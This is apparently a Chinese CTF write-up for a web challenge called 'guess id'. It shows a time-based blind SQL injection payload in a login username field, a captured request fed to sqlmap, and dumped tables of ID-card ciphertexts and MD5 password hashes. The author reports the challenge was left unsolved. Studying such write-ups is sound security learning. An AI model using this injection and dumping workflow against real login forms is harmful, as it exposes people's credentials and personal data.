[Web]guess id-jaivy xp0int Posted on May 7 2018 登录框的用户名处存在时间盲注 ``` {"username":"jaivy'and sleep(10) and '1'='1","password":"jaivy","__server__cookie__":{}} ``` 于是抓取数据包,加上星号*标记,丢进sqlmap里面跑 ``` POST /login HTTP/1.1 Host: 123.59.134.192:8415 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/json Referer: http://123.59.134.192/ Content-Length: 63 Origin: http://123.59.134.192 Connection: close {"username":"jaivy*","password":"jaivy","__server__cookie__":{}} ``` 使用-r参数等命令 python sqlmap.py -r 1.txt --current-db 可以得到如下信息 ``` [*] data [*] information_schema [*] mysql [*] performance_schema [*] sys Database: data [4 tables] +-----------------+ | sensitive_visit | | token_list | | user_info | | user_text | +-----------------+ Database: data Table: user_info [4 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | id | int(1E) | | id_card_number | varchar(100) | | name | varchar(64) | | password | varchar(35) | +----------------+--------------+ ``` ``` Database: data Table: user_info [10 entries] +----------------------------------------------+ | id_card_number | +----------------------------------------------+ | /+6jj+chVE3xTOMmlvqOf01QcSojhOCGX1OdbyNdPXw= | | /+kpLdjPWRKkaNuLhkVm1T7hLYdDfgHFKf3K/DI5E4I= | | /+zkN9u+GzkexlqPqcpc8zK6TkZKVeX1AVHUbG2bOgI= | | /0CrajU+xYSHX2T2bswoub3OT8e5zw5og0rALfXcefg= | | /0k3g+bUYzizDC+QC2F1zL3OT8e5zw5og0rALfXcefg= | | /0OGfOnvp2lwuhuLhkVaf01QcSojhOCGX1OdbyNdPXw= | | /+kpLdjPWRKkaNuLhkVm1T7hLYdDfgHFKf3K/DNdPXw= | | /+kpLdjPWRKkaNuLhkVmaT7hLYdDfgHFKf3K/DI5E4I= | | /+zkN9u+GzkexlqPqcpc8zK6TkZKVeX1AVHUbG2bOgI= | | /+zy5PlSdgleEq3o0PH1us8ZuHQb8m8/qAHbDdUCnzE= | +----------------------------------------------+ Database: data Table: user_info [6 entries] +----+----------------------------------------------+-------------+------------- ---------------------+ | id | id_card_number | name | password| +----+----------------------------------------------+-------------+------------- ---------------------+ | 1 | G735+fZ5w84htVDHWflfJVAFwX8X+maoU9RopTeKTKk= | admin | 8d5eef8ac0367b7177175b7609ef7cd0 | | 2 | eKsUqzHbhtRnrKs07QNkA0P+7SDX6tQ4OD98+LC6qX4= | 123 |sss 202cb962ac59075b964b07152d2X4b70 | | 3 | 4ojUpAFnwCN/7YtdPBrCpUyvnoYytm4bxMbwwmg25w0= | image | b4581065ffc340bd0ee01d093a40d7ce | | 4 | ijPtBAnnfIoAQMm9GYib3S0XY3pqMkeTKWw8JvVkra8= | admin1 | 21232f297a57a5a743894a0e4a801fc3 | | 5 | 8/JADwnyRRElygit1C1H8P/v1Gf9Gk95Ao4gHMrijTg= | veneno | f81f10e631f3c519d5a44d8da976fb67 | | 6 | XIZrMs7G/qIn15tTN+a2jr3BRPRp0TkdJPvZLqtuHJY= | ciphertest1 | e10adc3949ba59abbe56e057f20f883e | +----+----------------------------------------------+-------------+------------- ---------------------+ ``` dump出来的数据有点迷,后面比赛结束了,这题做到这就没做出来了。 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] Shellcode Manager - Cpt.shao [Web]shopping log - jaivy
没有帐号? 立即注册